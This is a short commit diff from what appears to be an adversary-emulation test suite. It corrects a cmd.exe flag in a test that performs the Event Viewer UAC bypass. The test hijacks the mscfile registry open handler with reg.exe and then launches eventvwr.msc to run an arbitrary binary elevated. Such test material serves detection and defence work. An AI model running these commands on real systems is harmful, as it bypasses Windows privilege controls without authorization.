Update flag for cmd.exe (#416)
This commit is contained in:
@@ -20,7 +20,7 @@ atomic_tests:
|
||||
name: command_prompt
|
||||
command: |
|
||||
reg.exe add hkcu\software\classes\mscfile\shell\open\command /ve /d "#{executable_binary}" /f
|
||||
cmd.exe -c eventvwr.msc
|
||||
cmd.exe /c eventvwr.msc
|
||||
|
||||
- name: Bypass UAC using Event Viewer - PowerShell
|
||||
description: |
|
||||
|
||||
Reference in New Issue
Block a user